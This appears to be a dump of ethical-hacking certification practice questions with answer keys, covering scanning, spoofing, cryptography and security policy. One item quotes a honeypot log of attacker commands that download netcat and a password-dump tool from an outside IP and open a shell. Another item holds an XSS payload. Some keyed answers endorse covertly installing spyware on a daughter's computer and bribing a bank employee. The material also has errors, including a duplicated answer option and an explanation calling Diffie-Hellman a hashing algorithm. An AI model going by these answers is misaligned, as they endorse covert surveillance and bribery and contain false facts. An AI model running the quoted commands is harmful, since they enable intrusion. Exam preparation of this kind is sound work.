752 Harold just got home from working at Henderson LLC where he works as an IT technician. He was able to get off early because they were not too busy. When he walks into his home office, he notices his teenage daughter on the computer, apparently chatting with someone online. As soon as she hears Harold enter the room, she closes all her windows and tries to act like she was playing a game. When Harold asks her what she was doing, she acts very nervous and does not give him a straight answer. Harold is very concerned because he does not want his daughter to fall victim to online predators and the sort. Harold doesn't necessarily want to install any programs that will restrict the sites his daughter goes to, because he doesn't want to alert her to his trying to figure out what she is doing. Harold wants to use some kind of program that will track her activities online, and send Harold an email of her activity once a day so he can see what she has been up to. What kind of software could Harold use to accomplish this? A. Install hardware Keylogger on her computer B. Install screen capturing Spyware on her computer C. Enable Remote Desktop on her computer D. Install VNC on her computer

B ( Install screen capturing Spyware on her computer)

741 Jacob is looking through a traffic log that was captured using Wireshark. Jacob has come across what appears to be SYN requests to an internal computer from a spoofed IP address. What is Jacob seeing here? A. Jacob is seeing a Smurf attack. B. Jacob is seeing a SYN flood. C. He is seeing a SYN/ACK attack. D. He has found evidence of an ACK flood.

B ( Jacob is seeing a SYN flood.)

706 "Testing the network using the same methodologies and tools employed by attackers" Identify the correct terminology that defines the above statement. A. Vulnerability Scanning B. Penetration Testing C. Security Policy Implementation D. Designing Network Security

B ( Penetration Testing)

762 Simon is security analyst writing signatures for a Snort node he placed internally that captures all mirrored traffic from his border firewall. From the following signature, what will Snort look for in the payload of the suspected packets? alert tcp $EXTERNAL_NET any -> $HOME_NET 27374 (msg: "BACKDOOR SIG - SubSseven 22";flags: A+; content: "|0d0a5b52504c5d3030320d0a|"; reference:arachnids,485;) alert A. The payload of 485 is what this Snort signature will look for. B. Snort will look for 0d0a5b52504c5d3030320d0a in the payload. C. Packets that contain the payload of BACKDOOR SIG - SubSseven 22 will be flagged. D. From this snort signature, packets with HOME_NET 27374 in the payload will be flagged.

B ( Snort will look for 0d0a5b52504c5d3030320d0a in the payload.)

703 Neil is closely monitoring his firewall rules and logs on a regular basis. Some of the users have complained to Neil that there are a few employees who are visiting offensive web site during work hours, without any consideration for others. Neil knows that he has an up-to-date content filtering system and such access should not be authorized. What type of technique might be used by these offenders to access the Internet without restriction? A. They are using UDP that is always authorized at the firewall B. They are using HTTP tunneling software that allows them to communicate with protocols in a way it was not intended C. They have been able to compromise the firewall, modify the rules, and give themselves proper access D. They are using an older version of Internet Explorer that allow them to bypass the proxy server

B ( They are using HTTP tunneling software that allows them to communicate with protocols in a way it was not intended)

720 You are trying to break into a highly classified top-secret mainframe computer with highest security system in place at Merclyn Barley Bank located in Los Angeles. You know that conventional hacking doesn't work in this case, because organizations such as banks are generally tight and secure when it comes to protecting their systems. In other words you are trying to penetrate an otherwise impenetrable system. How would you proceed? A. Look for "zero-day" exploits at various underground hacker websites in Russia and China and buy the necessary exploits from these hackers and target the bank's network B. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information C. Launch DDOS attacks against Merclyn Barley Bank's routers and firewall systems using 100,000 or more "zombies" and "bots" D. Try to conduct Man-in-the-Middle (MiTM) attack and divert the network traffic going to the Merclyn Barley Bank's Webserver to that of your machine using DNS Cache Poisoning techniques

B ( Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information)

646 Most cases of insider abuse can be traced to individuals who are introverted, incapable of dealing with stress or conflict, and frustrated with their job, office politics, and lack of respect or promotion. Disgruntled employees may pass company secrets and intellectual property to competitors for monitory benefits. Here are some of the symptoms of a disgruntled employee: a. Frequently leaves work early, arrive late or call in sick b. Spends time surfing the Internet or on the phone c. Responds in a confrontational, angry, or overly aggressive way to simple requests or comments d. Always negative; finds fault with everything These disgruntled employees are the biggest threat to enterprise security. How do you deal with these threats? (Select 2 answers) A. Limit access to the applications they can run on their desktop computers and enforce strict work hour rules B. By implementing Virtualization technology from the desktop to the data centre, organizations can isolate different environments with varying levels of access and security to various employees C. Organizations must ensure that their corporate data is centrally managed and delivered to users just and when needed D. Limit Internet access, e-mail communications, access to social networking sites and job hunting portals

B,C

130 SNMP is a protocol used to query hosts, servers, and devices about performance or health status data. This protocol has long been used by hackers to gather great amount of information about remote hosts. Which of the following features makes this possible? (Choose two) A. It used TCP as the underlying protocol. B. It uses community string that is transmitted in clear text. C. It is susceptible to sniffing. D. It is used by all network devices on the market. 77

B,C (Explanation: Simple Network Management Protocol (SNMP) is a protocol which can be used by administrators to remotely manage a computer or network device. There are typically 2 modes of remote SNMP monitoring. These modes are roughly 'READ' and 'WRITE' (or PUBLIC and PRIVATE). If an attacker is able to guess a PUBLIC community string, they would be able to read SNMP data (depending on which MIBs are installed) from the remote device. This information might include system time, IP addresses, interfaces, processes running, etc. Version 1 of SNMP has been criticized for its poor security. Authentication of clients is performed only by a "community string", in effect a type of password, which is transmitted in cleartext.)

702 This is an example of whois record. Sometimes a company shares a little too much information on their organization through public domain records. Based on the above whois record, what can an attacker do? (Select 2 answers) A. Search engines like Google, Bing will expose information listed on the WHOIS record B. An attacker can attempt phishing and social engineering on targeted individuals using the information from WHOIS record C. Spammers can send unsolicited e-mails to addresses listed in the WHOIS record D. IRS Agents will use this information to track individuals using the WHOIS record information

B,C ( An attacker can attempt phishing and social engineering on targeted individuals using the information from WHOIS record. Spammers can send unsolicited e-mails to addresses listed in the WHOIS record)

607 Anonymizer sites access the Internet on your behalf, protecting your personal information from disclosure. An anonymizer protects all of your computer's identifying information while it surfs for you, enabling you to remain at least one step removed from the sites you visit. You can visit Web sites without allowing anyone to gather information on sites visited by you. Services that provide anonymity disable pop-up windows and cookies, and conceal visitor's IP address. These services typically use a proxy server to process each HTTP request. When the user requests a Web page by clicking a hyperlink or typing a URL into their browser, the service retrieves and displays the information using its own server. The remote server (where the requested Web page resides) receives information on the anonymous Web surfing service in place of your information. In which situations would you want to use anonymizer? (Select 3 answers) A. Increase your Web browsing bandwidth speed by using Anonymizer B. To protect your privacy and Identity on the Internet C. To bypass blocking applications that would prevent access to Web sites or parts of sites that you want to visit. D. Post negative entries in blogs without revealing your IP identity

B,C,D

666 A Trojan horse is a destructive program that masquerades as a benign application. The software initially appears to perform a desirable function for the user prior to installation and/or execution, but in addition to the expected function steals information or harms the system. The challenge for an attacker is to send a convincing file attachment to the victim, which gets easily executed on the victim machine without raising any suspicion. Today's end users are quite knowledgeable about malwares and viruses. Instead of sending games and fun executables, Hackers today are quite successful in spreading the Trojans using Rogue security software. What is Rogue security software? A. A flash file extension to Firefox that gets automatically installed when a victim visits rogue software disabling websites B. A Fake AV program that claims to rid a computer of malware, but instead installs spyware or other malware onto the computer. This kind of software is known as rogue security software. C. A Fake AV program that claims to rid a computer of malware, but instead installs spyware or other malware onto the computer. This kind of software is known as rogue security software. D. A Fake AV program that claims to rid a computer of malware, but instead installs spyware or other malware onto the computer. This kind of software is known as rogue security software. E. Rogue security software is based on social engineering technique in which the attackers lures victim to visit spear phishing websites F. This software disables firewalls and establishes reverse connecting tunnel between the victim's machine and that of the attacker

B,C,D

168 As a securing consultant, what are some of the things you would recommend to a company to ensure DNS security? Select the best answers. A. Use the same machines for DNS and other applications B. Harden DNS servers C. Use split-horizon operation for DNS servers D. Restrict Zone transfers E. Have subnet diversity between DNS servers

B,C,D,E (Explanation: Explanations: A is not a correct answer as it is never recommended to use a DNS server for any other application. Hardening of the DNS servers makes them less vulnerable to attack. It is recommended to split internal and external DNS servers (called split-horizon operation). Zone transfers should only be accepted from authorized DNS servers. By having DNS servers on different subnets, you may prevent both from going down, even if one of your networks goes down.)

492 Which of the following are potential attacks on cryptography? (Select 3) A. One-Time-Pad Attack B. Chosen-Ciphertext Attack C. Man-in-the-Middle Attack D. Known-Ciphertext Attack E. Replay Attack

B,C,E (Explanation: A chosen-ciphertext attack (CCA) is an attack model for cryptanalysis in which the cryptanalyst chooses a ciphertext and causes it to be decrypted with an unknown key. Specific forms of this attack are sometimes termed "lunchtime" or "midnight" attacks, referring to a scenario in which an attacker gains access to an unattended decryption machine. In cryptography, a manin- the-middle attack (MITM) is an attack in which an attacker is able to read, insert and modify at will, messages between two parties without either party knowing that the link between them has been compromised. The attacker must be able to observe and intercept messages going between the two victims. A replay attack is a form of network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed. This is carried out either by the originator or by an adversary who intercepts the data and retransmits it, possibly as part of a masquerade attack by IP packet substitution (such as stream cipher attack). 298)

143 What ports should be blocked on the firewall to prevent NetBIOS traffic from not coming through the firewall if your network is comprised of Windows NT, 2000, and XP?(Choose all that apply. A. 110 B. 135 C. 139 D. 161 E. 445 F. 1024

B,C,E (Explanation: NetBIOS traffic can quickly be used to enumerate and attack Windows computers. Ports 135, 139, and 445 should be blocked.)

589 You are configuring the security options of your mail server and you would like to block certain file attachments to prevent viruses and malware from entering the users inbox. Which of the following file formats will you block? (Select up to 6) A. .txt B. .vbs C. .pif D. .jpg E. .gif F. .com G. .htm H. .rar I. .scr J. .exe

B,C,E,F,I,J Explanation: 356 http://office.microsoft.com/en-us/outlook/HP030850041033.aspx)

663 Which of the following statement correctly defines ICMP Flood Attack? (Select 2 answers) 401 A. Bogus ECHO reply packets are flooded on the network spoofing the IP and MAC address B. The ICMP packets signal the victim system to reply and the combination of traffic saturates the bandwidth of the victim's network C. ECHO packets are flooded on the network saturating the bandwidth of the subnet causing denial of service D. A DDoS ICMP flood attack occurs when the zombies send large volumes of ICMP_ECHO_REPLY packets to the victim system.

B,D

251 Samantha was hired to perform an internal security test of company. She quickly realized that all networks are making use of switches instead of traditional hubs. This greatly limits her ability to gather information through network sniffing. Which of the following techniques can she use to gather information from the switched network or to disable some of the traffic isolation features of the switch? (Choose two) 151 A. Ethernet Zapping B. MAC Flooding C. Sniffing in promiscuous mode D. ARP Spoofing

B,D (Explanation: In a typical MAC flooding attack, a switch is flooded with packets, each containing different source MAC addresses. The intention is to consume the limited memory set aside in the switch to store the MAC address-to-physical port translation table.The result of this attack causes the switch to enter a state called failopen mode, in which all incoming packets are broadcast out on all ports (as with a hub), instead of just down the correct port as per normal operation. The principle of ARP spoofing is to send fake, or 'spoofed', ARP messages to an Ethernet LAN. These frames contain false MAC addresses, confusing network devices, such as network switches. As a result frames intended for one machine can be mistakenly sent to another (allowing the packets to be sniffed) or an unreachable host (a denial of service attack).)

547 There is some dispute between two network administrators at your company. Your boss asks you to come and meet with the administrators to set the record straight. Which of these are true about PKI and encryption? Select the best answers. A. PKI provides data with encryption, compression, and restorability. B. Public-key encryption was invented in 1976 by Whitfield Diffie and Martin Hellman. C. When it comes to eCommerce, as long as you have authenticity, and authenticity, you do not need encryption. D. RSA is a type of encryption.

B,D (Explanation: PKI provides confidentiality, integrity, and authenticity of the messages exchanged between these two types of systems. The 3rd party provides the public key and the receiver verifies the message with a combination of the private and public key. Public-key encryption WAS invented in 1976 by Whitfield Diffie and Martin Hellman. The famous hashing algorithm Diffie- Hellman was named after them. The RSA Algorithm is created by the RSA Security company that also has created other widely used encryption algorithms.)

6 What are the two basic types of attacks?(Choose two. A. DoS B. Passive C. Sniffing D. Active E. Cracking

B,D (Explanation: Passive and active attacks are the two basic types of attacks.)

75 What does a type 3 code 13 represent?(Choose two. A. Echo request B. Destination unreachable C. Network unreachable D. Administratively prohibited E. Port unreachable F. Time exceeded

B,D (Explanation: Type 3 code 13 is destination unreachable administratively prohibited. This type of message is typically returned from a device blocking a port.)

153 Which of the following tools are used for enumeration? (Choose three.) A. SolarWinds B. USER2SID C. Cheops D. SID2USER E. DumpSec

B,D,E (Explanation: USER2SID, SID2USER, and DumpSec are three of the tools used for system enumeration. Others are tools such as NAT and Enum. Knowing which tools are used in each step of the hacking methodology is an important goal of the CEH exam. You should spend a portion of your time preparing for the test practicing with the tools and learning to understand their output.)

73 What are two things that are possible when scanning UDP ports? (Choose two. A. A reset will be returned B. An ICMP message will be returned C. The four-way handshake will not be completed D. An RFC 1294 message will be returned E. Nothing

B,E (Explanation: Closed UDP ports can return an ICMP type 3 code 3 message. No response can mean the port is open or the packet was silently dropped.)

186 Which of the following LM hashes represent a password of less than 8 characters? (Select 2) A. BA810DBA98995F1817306D272A9441BB B. 44EFCE164AB921CQAAD3B435B51404EE C. 0182BD0BD4444BF836077A718CCDF409 D. CEC52EB9C8E3455DC2265B23734E0DAC E. B757BF5C0D87772FAAD3B435B51404EE F. E52CAC67419A9A224A3B108F3FA6CB6D

B,E Explanation: Notice the last 8 characters are the same)

103 You want to know whether a packet filter is in front of 192.168.1.10. Pings to 192.168.1.10 don't get answered. A basic nmap scan of 192.168.1.10 seems to hang without returning any information. What should you do next? A. Use NetScan Tools Pro to conduct the scan B. Run nmap XMAS scan against 192.168.1.10 61 C. Run NULL TCP hping2 against 192.168.1.10 D. The firewall is blocking all the scans to 192.168.1.10

C

103 A security engineer has been asked to deploy a secure remote access solution that will allow employees to connect to the company's internal network. Which of the following can be implemented to minimize the opportunity for the man-in-the-middle attack to occur? A. SSL B. Mutual authentication C. IPSec D. Static IP addresses

C

104 A person approaches a network administrator and wants advice on how to send encrypted email from home. The end user does not want to have to pay for any license fees or manage server services. Which of the following is the most secure encryption protocol that the network administrator should recommend? A. IP Security (IPSEC) B. Multipurpose Internet Mail Extensions (MIME) C. Pretty Good Privacy (PGP) D. Hyper Text Transfer Protocol with Secure Socket Layer (HTTPS)

C

107 A recently hired network security associate at a local bank was given the responsibility to perform daily scans of the internal network to look for unauthorized devices. The employee decides to write a script that will scan the network for unauthorized devices every morning at 5:00 am. Which of the following programming languages would most likely be used? A. PHP B. C# C. Python D. ASP.NET

C

118 A hacker is attempting to use nslookup to query Domain Name Service (DNS). The hacker uses the nslookup interactive mode for the search. Which command should the hacker type into the command shell to request the appropriate records? A. Locate type=ns B. Request type=ns C. Set type=ns D. Transfer type=ns

C

119 A hacker searches in Google for filetype:pcf to find Cisco VPN config files. Those files may contain connectivity passwords that can be decoded with which of the following? A. Cupp B. Nessus C. Cain and Abel D. John The Ripper Pro

C

120 On a Linux device, which of the following commands will start the Nessus client in the background so that the Nessus server can be configured? A. nessus + B. nessus *s C. nessus & D. nessus -d

C

122 What is the best defense against privilege escalation vulnerability? A. Patch systems regularly and upgrade interactive login privileges at the system administrator level. B. Run administrator and applications on least privileges and use a content registry for tracking. C. Run services with least privileged accounts and implement multi-factor authentication and authorization. D. Review user roles and administrator privileges for maximum utilization of automation services.

C

125 Which protocol and port number might be needed in order to send log messages to a log analysis tool that resides behind a firewall? A. UDP 123 B. UDP 541 C. UDP 514 D. UDP 415

C

140 Diffie-Hellman (DH) groups determine the strength of the key used in the key exchange process. Which of the following is the correct bit size of the Diffie-Hellman (DH) group 5? A. 768 bit key B. 1025 bit key C. 1536 bit key D. 2048 bit key

C

144 A security analyst in an insurance company is assigned to test a new web application that will be used by clients to help them choose and apply for an insurance plan. The analyst discovers that the application is developed in ASP scripting language and it uses MSSQL as a database backend. The analyst locates the application's search form and introduces the following code in the search input field: IMG SRC=vbscript:msgbox("Vulnerable");> originalAttribute="SRC" originalPath="vbscript:msgbox("Vulnerable");>" When the analyst submits the form, the browser returns a pop-up window that says "Vulnerable". Which web applications vulnerability did the analyst discover? A. Cross-site request forgery B. Command injection C. Cross-site scripting D. SQL injection

C

15 What type of OS fingerprinting technique sends specially crafted packets to the remote OS and analyzes the received response? A. Passive 10 B. Reflective C. Active D. Distributive

C

159 A security engineer is attempting to map a company's internal network. The engineer enters in the following NMAP command: NMAP -n -sS -P0 -p 80 ***.***.**.** What type of scan is this? A. Quick scan B. Intense scan C. Stealth scan D. Comprehensive scan

C

160 What is the broadcast address for the subnet 190.86.168.0/22? A. 190.86.168.255 B. 190.86.255.255 C. 190.86.171.255 D. 190.86.169.255

C

168 Fingerprinting VPN firewalls is possible with which of the following tools? A. Angry IP B. Nikto C. Ike-scan D. Arp-scan

C

182 The intrusion detection system at a software development company suddenly generates multiple alerts regarding attacks against the company's external webserver, VPN concentrator, and DNS servers. What should the security team do to determine which alerts to check first? A. Investigate based on the maintenance schedule of the affected systems. B. Investigate based on the service level agreements of the systems. C. Investigate based on the potential effect of the incident. D. Investigate based on the order that the alerts arrived in.

C

183 An IT security engineer notices that the company's web server is currently being hacked. What should the engineer do next? A. Unplug the network connection on the company's web server. B. Determine the origin of the attack and launch a counterattack. C. Record as much information as possible from the attack. D. Perform a system restart on the company's web server.

C

198 Which of the following defines the role of a root Certificate Authority (CA) in a Public Key Infrastructure (PKI)? A. The root CA is the recovery agent used to encrypt data when a user's certificate is lost. B. The root CA stores the user's hash value for safekeeping. C. The CA is the trusted root that issues certificates. D. The root CA is used to encrypt email messages to prevent unintended disclosure of data

C

199 A network security administrator is worried about potential man-in-the-middle attacks when users access a corporate web site from their workstations. Which of the following is the best remediation against this type of attack? A. Implementing server-side PKI certificates for all connections B. Mandating only client-side PKI certificates for all connections C. Requiring client and server PKI certificates for all connections D. Requiring strong authentication for all DNS queries

C

203 SOAP services use which technology to format information? A. SATA B. PCI C. XML D. ISDN

C

204 Which statement best describes a server type under an N-tier architecture? A. A group of servers at a specific layer B. A single server with a specific role C. A group of servers with a unique role D. A single server at a specific layer

C

21 A company has publicly hosted web applications and an internal Intranet protected by a firewall. Which technique will help protect against enumeration? A. Reject all invalid email received via SMTP. B. Allow full DNS zone transfers. C. Remove A records for internal hosts. D. Enable null session pipes.

C

218 Which of the following ensures that updates to policies, procedures, and configurations are made in a controlled and documented fashion? A. Regulatory compliance B. Peer review C. Change management D. Penetration testing

C

219 Which of the following tools would be the best choice for achieving compliance with PCI Requirement 11? A. Truecrypt B. Sub7 C. Nessus D. Clamwin

C

22 Which of the following techniques will identify if computer files have been changed? A. Network sniffing B. Permission sets C. Integrity checking hashes D. Firewall alerts

C

229 Which initial procedure should an ethical hacker perform after being brought into an organization? A. Begin security testing. B. Turn over deliverables. C. Sign a formal contract with non-disclosure D. Assess what the organization is trying to protect.

C

256 Which of the following display filters will you enable in Ethereal to view the three-way handshake for a connection from host 192.168.0.1? A. ip == 192.168.0.1 and tcp.syn B. ip.addr = 192.168.0.1 and syn = 1 C. ip.addr==192.168.0.1 and tcp.flags.syn D. ip.equals 192.168.0.1 and syn.equals on

C

32 Which of the following is considered an acceptable option when managing a risk? A. Reject the risk. B. Deny the risk. C. Mitigate the risk. D. Initiate the risk.

C

322 Bob is going to perform an active session hijack against company. He has acquired the target that allows session oriented connections (Telnet) and performs sequence prediction on the target operating system. He manages to find an active session due to the high level of traffic on the network. So, what is Bob most likely to do next? A. Take over the session. B. Reverse sequence prediction. C. Guess the sequence numbers. 193 D. Take one of the parties' offline.

C

352 Bill has successfully executed a buffer overflow against a Windows IIS web server. He has been able to spawn an interactive shell and plans to deface the main web page. He first attempts to use the "echo" command to simply overwrite index.html and remains unsuccessful. He then attempts to delete the page and achieves no progress. Finally, he tries to overwrite it with another page in which also he remains unsuccessful. What is the probable cause of Bill's problem? A. You cannot use a buffer overflow to deface a web page B. There is a problem with the shell and he needs to run the attack again C. The HTML file has permissions of read only D. The system is a honeypot

C

360 An attacker is trying to redirect the traffic of a small office. That office is using their own mail server, DNS server and NTP server because of the importance of their job. The attacker gains access to the DNS server and redirects the direction www.google.com to his own IP address. Now when the employees of the office want to go to Google they are being redirected to the attacker machine. What is the name of this kind of attack? A. ARP Poisoning B. Smurf Attack C. DNS spoofing D. MAC Flooding

C

363 The company ABC recently discovered that their new product was released by the opposition before their premiere. They contract an investigator who discovered that the maid threw away papers with confidential information about the new product and the opposition found it in the garbage. What is the name of the technique used by the opposition? A. Hack attack B. Sniffing C. Dumpster diving D. Spying

C

368 Seth is starting a penetration test from inside the network. He hasn't been given any information about the network. What type of test is he conducting? A. Internal Whitebox B. External, Whitebox C. Internal, Blackbox D. External, Blackbox

C

37 If the final set of security controls does not eliminate all risk in a system, what could be done next? A. Continue to apply controls until there is zero risk. B. Ignore any remaining risk. C. If the residual risk is low enough, it can be accepted. D. Remove current controls since they are not completely effective.

C

373 An IT employee got a call from one of our best customers. The caller wanted to know about the company's network infrastructure, systems, and team. New opportunities of integration are in sight for both company and customer. What should this employee do? A. Since the company's policy is all about Customer Service, he/she will provide information. B. Disregarding the call, the employee should hang up. C. The employee should not provide any information without previous management authorization. D. The employees can not provide any information; but, anyway, he/she will provide the name of the person in charge

C

374 A well-intentioned researcher discovers a vulnerability on the web site of a major corporation. What should he do? A. Ignore it. B. Try to sell the information to a well-paying party on the dark web C. Notify the web site owner so that corrective action be taken as soon as possible to patch the vulnerability. D. Exploit the vulnerability without harming the web site owner so that attention be drawn to the problem.

C

376 Cryptography is the practice and study of techniques for secure communication in the presence of third parties (called adversaries.) More generally, it is about constructing and analyzing protocols that overcome the influence of adversaries and that are related to various aspects in information security such as data confidentiality, data integrity, authentication, and non-repudiation. Modern cryptography intersects the disciplines of mathematics, computer science, and electrical engineering. Applications of cryptography include ATM cards, computer passwords, and electronic commerce. Basic example to understand how cryptography works is given below: SECURE (plain text) +1(+1 next letter, for example, the letter ""T"" is used for ""S"" to encrypt.) TFDVSF (encrypted text) +=logic=> Algorithm 1=Factor=> Key Which of the following choices is true about cryptography? A. Algorithm is not the secret, key is the secret. B. Symmetric-key algorithms are a class of algorithms for cryptography that use the different cryptographic keys for both encryption of plaintext and decryption of ciphertext. C. Secure Sockets Layer (SSL) use the asymmetric encryption both (public/private key pair) to deliver the shared session key and to achieve a communication way. D. Public-key cryptography, also known as asymmetric cryptography, public key is for decrypt, private key is for encrypt.

C

378 Which of the following is considered an exploit framework and has the ability to perform automated attacks on services, ports, applications and unpatched security flaws in a computer system? A. Wireshark B. Maltego C. Metasploit D. Nessus

C

380 The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a 226 malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below: "cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00 >>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom" "cmd1.exe /c ftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 e-cmd1.exe" What can you infer from the exploit given? A. It is a local exploit where the attacker logs in using username johna2k. B. There are two attackers on the system - johna2k and haxedj00. C. The attack is a remote exploit and the hacker downloads three files. D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.

C

380 The network in ABC company is using the network address 192.168.1.64 with mask 255.255.255.192. In the network the servers are in the addresses 192.168.1.122, 192.168.1.123 and 192.168.1.124. An attacker is trying to find those servers but he cannot see them in his scanning. The command he is using is: nmap 192.168.1.64/28. Why he cannot see the servers? A. The network must be down and the nmap command and IP address are ok. B. He needs to add the command ''''ip address'''' just before the IP address. C. He is scanning from 192.168.1.64 to 192.168.1.78 because of the mask /28 and the servers are not in that range D. He needs to change the address to 192.168.1.0 with the same mask.

C

385 A penetration test was done at a company. After the test, a report was written and given to the company's IT authorities. A section from the report is shown below: Access List should be written between VLANs. Port security should be enabled for the intranet. A security solution which filters data packets should be set between intranet (LAN) and DMZ. A WAF should be used in front of the web applications. According to the section from the report, which of the following choice is true? A. MAC Spoof attacks cannot be performed B. Possibility of SQL Injection attack is eliminated C. A stateful firewall can be used between intranet (LAN) and DMZ. D. There is access control policy between VLANs.

C

389 When purchasing a biometric system, one of the considerations that should be reviewed is the processing speed. Which of the following best describes what it is meant by processing? A. The amount of time it takes to convert biometric data into a template on a smart card B. The amount of time and resources that are necessary to maintain a biometric system. C. The amount of time it takes to be either accepted or rejected form when an individual provides Identification and authentication information. D. How long it takes to setup individual user accounts.

C

390 Due to a slow down of normal network operations, IT department decided to monitor internet traffic for all of the employees. From a legal stand point, what would be troublesome to take this kind of measure? A. All of the employees would stop normal work activities B. IT department would be telling employees who the boss is C. Not informing the employees that they are going to be monitored could be an invasion of privacy. D. The network could still experience traffic slow down.

C

40 Which type of access control is used on a router or firewall to limit network activity? A. Mandatory B. Discretionary C. Rule-based D. Role-based

C

400 Which Metasploit Framework tool can help penetration tester for evading Anti-virus Systems? A. msfpayload B. msfcli C. msfencode D. msfd

C

405 Todd has been asked by the security officer to purchase a counter-based authentication system. Which of the following best describes this type of system? A. A biometric system that bases authentication decisions on behavioral attributes. B. A biometric system that bases authentication decisions on physical attributes. C. An authentication system that creates one-time passwords that are encrypted with secret keys. D. An authentication system that uses passphrases that are converted into virtual passwords.

C

406 Access control is often implemented through the use of MAC address filtering on wireless Access Points. Why is this considered to be a very limited security measure? A. Vendors MAC address assignment is published on the Internet. B. The MAC address is not a real random number. C. The MAC address is broadcasted and can be captured by a sniffer. D. The MAC address is used properly only on Macintosh computers.

C

408 What network security concept requires multiple layers of security controls to be placed throughout an IT infrastructure, which improves the security posture of an organization to defend against malicious attacks or potential vulnerabilities? A. Security through obscurity B. Host-Based Intrusion Detection System C. Defense in depth D. Network-Based Intrusion Detection System

C

41 At a Windows Server command prompt, which command could be used to list the running services? A. Sc query type= running B. Sc query \\servername C. Sc query D. Sc config

C

412 What is not a PCI compliance recommendation? A. Limit access to card holder data to as few individuals as possible B. Use encryption to protect all transmission of card holder data over any public network. C. Rotate employees handling credit card transactions on a yearly basis to different departments. D. Use a firewall between the public network and the payment card data

C

414 An attacker is using nmap to do a ping sweep and a port scanning in a subnet of 254 addresses. In which order should he perform these steps? A. The sequence does not matter. Both steps have to be performed against all hosts. B. First the port scan to identify interesting services and then the ping sweep to find hosts responding to icmp echo requests. C. First the ping sweep to identify live hosts and then the port scan on the live hosts. This way he saves time. D. The port scan alone is adequate. This way he saves timE.

C

42 Windows file servers commonly hold sensitive files, databases, passwords and more. Which of the following choices would be a common vulnerability that usually exposes them? A. Cross-site scripting B. SQL injection C. Missing patches D. CRLF injection

C

420 The security administrator of ABC needs to permit Internet traffic in the host 10.0.0.2 and UDP traffic in the host 10.0.0.3. Also he needs to permit all FTP traffic to the rest of the network and deny all other traffic. After he applied his ACL configuration in the router nobody can access to the ftp and the permitted hosts cannot access to the Internet. According to the next configuration what is happening in the network? access-list 102 deny tcp any any access-list 104 permit udp host 10.0.0.3 any access-list 110 permit tcp host 10.0.0.2 eq www any access-list 108 permit tcp any eq ftp any A. The ACL 110 needs to be changed to port 80 B. The ACL for FTP must be before the ACL 110 C. The first ACL is denying all TCP traffic and the other ACLs are being ignored by the router D. The ACL 104 needs to be first because is UDP

C

421 Bob received this text message on his mobile phone: ""Hello, this is Scott Smelby from the Yahoo Bank. Kindly contact me for a vital transaction on: [email protected]"". Which statement below is true? A. This is probably a legitimate message as it comes from a respectable organization. B. Bob should write to [email protected] to verify the identity of Scott. C. This is a scam as everybody can get a @yahoo address, not the Yahoo customer service employees. D. This is a scam because Bob does not know Scott.

C

422 In an internal security audit, the white hat hacker gains control over a user account and attempts to acquire access to another account's confidential files and information. How can he achieve this? A. Port Scanning B. Hacking Active Directory C. Privilege Escalation D. Shoulder-Surfing

C

423 Which of the following will perform an Xmas scan using NMAP? A. nmap -sA 192.168.1.254 B. nmap -sP 192.168.1.254 C. nmap -sX 192.168.1.254 D. nmap -sV 192.168.1.254

C

427 In which phase of the ethical hacking process can Google hacking be employed? This is a technique that involves manipulating a search string with specific operators to search for vulnerabilities. Example: allintitle: root passwd A. Maintaining Access B. Gaining Access C. Reconnaissance D. Scanning and Enumeration

C

43 While conducting a penetration test, the tester determines that there is a firewall between the tester's machine and the target machine. The firewall is only monitoring TCP handshaking of packets at the session layer of the OSI model. Which type of firewall is the tester trying to traverse? A. Packet filtering firewall B. Application-level firewall C. Circuit-level gateway firewall D. Stateful multilayer inspection firewall

C

431 What attack is used to crack passwords by using a precomputed table of hashed passwords? A. Brute Force Attack B. Hybrid Attack C. Rainbow Table Attack D. Dictionary Attack

C

439 There are several ways to gain insight on how a cryptosystem works with the goal of reverse engineering the process. A term describes when two pieces of data result in the same value is? A. Collision B. Collusion C. Polymorphism D. Escrow

C

441 One of the Forbes 500 companies has been subjected to a large scale attack. You are one of the shortlisted pen testers that they may hire. During the interview with the CIO, he emphasized that he wants to totally eliminate all risks. What is one of the first things you should do when hired? A. Interview all employees in the company to rule out possible insider threats. B. Establish attribution to suspected attackers. C. Explain to the CIO that you cannot eliminate all risk, but you will be able to reduce risk to acceptable levels. D. Start the Wireshark application to start sniffing network traffiC.

C

448 Knowing the nature of backup tapes, which of the following is the MOST RECOMMENDED way of storing backup tapes? A. In a cool dry environment B. Inside the data center for faster retrieval in a fireproof safe C. In a climate controlled facility offsite D. On a different floor in the same building

C

451 A big company, who wanted to test their security infrastructure, wants to hire elite pen testers like you. During the interview, they asked you to show sample reports from previous penetration tests. What should you do? A. Share reports, after NDA is signed B. Share full reports, not redacted C. Decline but, provide references D. Share full reports with redactions

C

